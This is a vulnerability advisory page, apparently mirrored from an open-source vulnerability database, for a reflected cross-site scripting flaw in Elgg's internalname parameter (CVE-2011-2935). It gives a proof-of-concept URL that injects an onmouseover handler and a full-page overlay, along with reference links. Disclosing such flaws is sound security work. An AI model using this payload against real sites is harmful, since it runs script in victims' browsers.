Lucene search
GoogleOSV:GHSA-MCFM-J5G6-W26FHistoryApr 22, 2022 - 12:24 a.m.
Elgg Reflected XSS Vulnerability
2022-04-2200:24:11
Google
osv.dev
2
VULNERABILITY DESCRIPTION
The internalname parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim’s browser
PROOF-OF-CONCEPT/EXPLOIT
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
References
yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin
github.com/Elgg/Elgg
github.com/Elgg/Elgg/commit/2843b4f846874d434a2403ac1f27e41035b45e04
github.com/Elgg/Elgg/issues/3544
nvd.nist.gov/vuln/detail/CVE-2011-2935
oss-security.openwall.narkive.com/1UH3NYx8/cve-request-elgg-1-7-10-multiple-vulnerabilities
security-tracker.debian.org/tracker/CVE-2011-2935
web.archive.org/web/20110907122607/blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released
Related
github
github
Elgg Reflected XSS Vulnerability
2022-04-22 00:24:11
cve
cve
CVE-2011-2935
2019-11-12 14:15:10
prion
prion
Cross site scripting
2019-11-12 14:15:00
cvelist
cvelist
CVE-2011-2935
2019-11-12 13:45:01
nvd
nvd
CVE-2011-2935
2019-11-12 14:15:10